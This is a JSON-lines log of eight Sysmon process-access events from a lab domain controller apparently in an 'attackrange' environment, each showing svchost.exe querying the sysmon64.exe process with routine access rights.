{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5579,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5580,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5581,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5582,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5583,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5584,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5585,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5586,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
